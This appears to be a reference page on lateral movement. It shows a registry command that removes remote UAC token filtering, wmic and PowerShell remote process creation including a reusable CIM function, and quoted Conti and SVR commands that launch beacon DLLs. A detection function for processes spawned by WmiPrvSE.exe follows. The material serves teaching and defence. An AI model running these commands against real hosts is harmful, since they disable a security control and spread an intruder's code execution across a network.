Lateral Movement
The adversary is trying to move through your environment. https://attack.mitre.org/tactics/TA0008/
Disable Remote UAC Restrictions
By default, UAC filters the token of any local account (other than the built-in RID-500 Administrator) that authenticates over the network, so local admin accounts cannot run WMI, PsExec or similar remote commands. Setting LocalAccountTokenFilterPolicy to 1 on the target removes that filtering; it must be set on the target, so it already requires administrative access there, and it does not affect domain accounts.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
WMIC
WMI allows users with the required privileges (by default, members of the local Administrators group on the target) to execute commands on remote hosts without additional tools. Adversaries abuse this to move laterally through a compromised network. The commands below create a process on the remote host through the Win32_Process class; Create returns only a return code and the new process ID, not the command's output, so adversaries typically redirect output to a file or use a payload that calls back. On the target, the new process is a child of WmiPrvSE.exe.
wmic /node:<remote_ip> /user:<username> /password:<password> process call create "cmd.exe /c <command>"
Or, with PowerShell:
Invoke-WMIMethod -class Win32_Process -Name Create -ArgumentList "cmd /c <command>" -ComputerName <remote_hostname>
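The same remote process creation written with the CIM cmdlets, as an added example that is not part of the original page. It uses explicit credentials, forces DCOM (the transport wmic uses) and maps the documented Win32_Process.Create return codes so a failure is explained rather than silently ignored. The target name, account and command are placeholders.

```powershell
# Added example: remote command execution through WMI with the CIM cmdlets.
# Assumed values: target host name, credential and command line are placeholders.

function Invoke-RemoteWmiProcess {
    param(
        [Parameter(Mandatory)][string]$ComputerName,   # target host (placeholder)
        [Parameter(Mandatory)][string]$CommandLine,    # command to run on the target
        [pscredential]$Credential                      # omit to use the current token
    )

    # Win32_Process.Create return codes as documented for the method
    $codes = @{ 0 = 'Success'; 2 = 'Access denied'; 3 = 'Insufficient privilege';
                8 = 'Unknown failure'; 9 = 'Path not found'; 21 = 'Invalid parameter' }

    $sessionArgs = @{ ComputerName = $ComputerName }
    if ($Credential) { $sessionArgs.Credential = $Credential }

    # DCOM is what wmic uses; New-CimSession defaults to WSMan, which needs WinRM on the target.
    $session = New-CimSession @sessionArgs -SessionOption (New-CimSessionOption -Protocol Dcom)
    try {
        $result = Invoke-CimMethod -CimSession $session -ClassName Win32_Process `
                    -MethodName Create -Arguments @{ CommandLine = $CommandLine }
        $rc = [int]$result.ReturnValue
        [pscustomobject]@{
            Target     = $ComputerName
            ReturnCode = $rc
            Meaning    = if ($codes.ContainsKey($rc)) { $codes[$rc] } else { 'Other' }
            ProcessId  = $result.ProcessId   # $null unless ReturnCode is 0
        }
    }
    finally {
        Remove-CimSession $session
    }
}

# Usage (placeholders). Prompting for the credential keeps the password out of the
# command-line history and process-creation logs of the source host, unlike wmic /password.
$cred = Get-Credential -Message 'Account with local admin rights on the target'
Invoke-RemoteWmiProcess -ComputerName 'target-host' -Credential $cred `
    -CommandLine 'cmd.exe /c whoami > C:\Windows\Temp\out.txt'
```

Because Create returns no output, the example redirects the command's result to a file on the target; reading it back is a separate step (for instance over an admin share). A return code of 2 or 3 with a local account usually means the remote UAC token filtering described above is still in effect.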
Conti TTP
wmic /node:victim_ip process call create "rundll32.exe C:/ProgramData/beacon_dll DllRegisterServer"
Russian Foreign Intelligence Service (SVR) TTP
wmic /node:<remote_host's_IP> /user:<username> /password:<password> process call create "rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"
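Detection side, as an added example that is not part of the original page: all three commands above, whether they launch cmd.exe or rundll32.exe, appear on the target as a child of the WMI provider host, WmiPrvSE.exe. The function below flags such children from process-creation records and ranks shells and LOLBins highest. The record shape (Image, ParentImage, CommandLine, User) is the one carried by Sysmon event ID 1; the sample records are constructed, and the Sysmon log query at the end assumes Sysmon is installed with a process-creation rule.

```powershell
# Added example: flag processes spawned by WmiPrvSE.exe, the on-target footprint of
# WMI lateral movement. Input records are assumed to carry Sysmon event ID 1 fields.

function Find-WmiSpawnedProcess {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        if ($e.ParentImage -notmatch '\\WmiPrvSE\.exe$') { continue }
        # Any child of the provider host is worth recording; interpreters and LOLBins rank higher.
        $severity = if ($e.Image -match '\\(cmd|powershell|pwsh|rundll32|regsvr32|mshta|wscript|cscript)\.exe$') {
            'High'
        } else {
            'Medium'
        }
        [pscustomobject]@{
            Severity    = $severity
            User        = $e.User
            Image       = $e.Image
            CommandLine = $e.CommandLine
        }
    }
}

# Constructed sample records: what the wmic commands above produce on the target,
# plus a benign cmd.exe started from the desktop that must not be reported.
$sample = @(
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'; Image = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'cmd.exe /c whoami > C:\Windows\Temp\out.txt'; User = 'CORP\svc-backup' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'; Image = 'C:\Windows\System32\rundll32.exe'
                       CommandLine = 'rundll32.exe C:/ProgramData/beacon_dll DllRegisterServer'; User = 'CORP\svc-backup' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'; Image = 'C:\Program Files\Vendor\agent.exe'
                       CommandLine = 'agent.exe /inventory'; User = 'NT AUTHORITY\SYSTEM' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'; Image = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'cmd.exe'; User = 'CORP\jdoe' }
)
Find-WmiSpawnedProcess -Events $sample | Format-Table -AutoSize

# Live data: the same function over Sysmon process-creation events on this host
# (assumes Sysmon is installed and the caller can read its operational log).
$live = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } `
            -MaxEvents 5000 -ErrorAction SilentlyContinue |
    ForEach-Object {
        $d = @{}
        ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        [pscustomobject]$d
    }
Find-WmiSpawnedProcess -Events $live | Format-Table -AutoSize
```

Management agents that legitimately run under WmiPrvSE.exe will show up at Medium and should be tuned out by Image path and User; the cmd.exe and rundll32.exe children used by the playbooks above remain High. Pair this with network logons (Security event 4624, logon type 3) from the same account shortly before the process creation to recover the source host.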